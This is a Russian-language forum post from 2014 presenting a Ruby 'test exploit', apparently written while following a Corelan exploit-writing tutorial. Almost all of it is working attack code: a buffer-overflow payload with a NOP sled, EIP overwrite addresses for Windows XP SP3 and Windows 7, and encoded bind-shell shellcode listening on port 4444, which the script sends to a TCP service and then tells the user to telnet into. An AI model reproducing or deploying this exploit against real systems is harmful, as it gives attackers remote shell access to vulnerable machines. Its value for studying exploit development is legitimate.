Показать сообщение отдельно
Старый 03.04.2014, 22:30   #2
POS_troi
 
Аватар для POS_troi
 
Регистрация: 06.07.2010
Сообщений: 98
Репутация: 35
По умолчанию

Эксплойт на руби

PHP код:

#############################################################################
#
#  Test exploit 
#  https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/
#  POS_troi
#############################################################################

#!/usr/bin/ruby
# encoding: ASCII
require 'socket'

host "127.0.0.1"
port =  65500

junk 
"\x90" 504

# Change OS - uncomment
eip_overwrite '' <<
    
#[0x71A92B53].pack('V')  #Windows XP SP3
     
[0x778DC10A].pack('V')  #Windows Seven Ru

# windows/shell_bind_tcp
# LPORT=4444
shellcode="\x90" 50 #add 50 NOP
shellcode +=
        
# Start Shell code
        
"\xb8\x88\x69\x6f\x5e\xdb\xc4\xd9\x74\x24\xf4\x5a\x2b\xc9" +
        
"\xb1\x56\x31\x42\x13\x83\xc2\x04\x03\x42\x87\x8b\x9a\xa2" +
        
"\x7f\xc2\x65\x5b\x7f\xb5\xec\xbe\x4e\xe7\x8b\xcb\xe2\x37" +
        
"\xdf\x9e\x0e\xb3\x8d\x0a\x85\xb1\x19\x3c\x2e\x7f\x7c\x73" +
        
"\xaf\xb1\x40\xdf\x73\xd3\x3c\x22\xa7\x33\x7c\xed\xba\x32" +
        
"\xb9\x10\x34\x66\x12\x5e\xe6\x97\x17\x22\x3a\x99\xf7\x28" +
        
"\x02\xe1\x72\xee\xf6\x5b\x7c\x3f\xa6\xd0\x36\xa7\xcd\xbf" +
        
"\xe6\xd6\x02\xdc\xdb\x91\x2f\x17\xaf\x23\xf9\x69\x50\x12" +
        
"\xc5\x26\x6f\x9a\xc8\x37\xb7\x1d\x32\x42\xc3\x5d\xcf\x55" +
        
"\x10\x1f\x0b\xd3\x85\x87\xd8\x43\x6e\x39\x0d\x15\xe5\x35" +
        
"\xfa\x51\xa1\x59\xfd\xb6\xd9\x66\x76\x39\x0e\xef\xcc\x1e" +
        
"\x8a\xab\x97\x3f\x8b\x11\x76\x3f\xcb\xfe\x27\xe5\x87\xed" +
        
"\x3c\x9f\xc5\x79\xf1\x92\xf5\x79\x9d\xa5\x86\x4b\x02\x1e" +
        
"\x01\xe0\xcb\xb8\xd6\x07\xe6\x7d\x48\xf6\x08\x7e\x40\x3d" +
        
"\x5c\x2e\xfa\x94\xdc\xa5\xfa\x19\x09\x69\xab\xb5\xe1\xca" +
        
"\x1b\x76\x51\xa3\x71\x79\x8e\xd3\x79\x53\xb9\xd3\xb7\x87" +
        
"\xea\xb3\xb5\x37\x1d\x18\x33\xd1\x77\xb0\x15\x49\xef\x72" +
        
"\x42\x42\x88\x8d\xa0\xfe\x01\x1a\xfc\xe8\x95\x25\xfd\x3e" +
        
"\xb6\x8a\x55\xa9\x4c\xc1\x61\xc8\x53\xcc\xc1\x83\x6c\x87" +
        
"\x98\xfd\x3f\x39\x9c\xd7\xd7\xda\x0f\xbc\x27\x94\x33\x6b" +
        
"\x70\xf1\x82\x62\x14\xef\xbd\xdc\x0a\xf2\x58\x26\x8e\x29" +
        
"\x99\xa9\x0f\xbf\xa5\x8d\x1f\x79\x25\x8a\x4b\xd5\x70\x44" +
        
"\x25\x93\x2a\x26\x9f\x4d\x80\xe0\x77\x0b\xea\x32\x01\x14" +
        
"\x27\xc5\xed\xa5\x9e\x90\x12\x09\x77\x15\x6b\x77\xe7\xda" +
        
"\xa6\x33\x17\x91\xea\x12\xb0\x7c\x7f\x27\xdd\x7e\xaa\x64" +
        
"\xd8\xfc\x5e\x15\x1f\x1c\x2b\x10\x5b\x9a\xc0\x68\xf4\x4f" +
        
"\xe6\xdf\xf5\x45"
        
# End Shell code


# Work :)
begin
    
# Connect to host
    
puts "[+] Connecting to host #{host} on port #{port}"
    
connect TCPSocket.open(hostport)

    
# Send payload
    
puts "[+] Sending payload"
    
connect.puts junk eip_overwrite shellcode "\n"
    
puts "[+] Payload sent"
    
puts "\r\n\r\nConnect: telnet #{host} 4444"
    
#close connect to host
    
connect.close
#error
 
rescue Exception => error
     puts error
end 

Последний раз редактировалось POS_troi; 03.04.2014 в 22:34..
POS_troi вне форума   Ответить с цитированием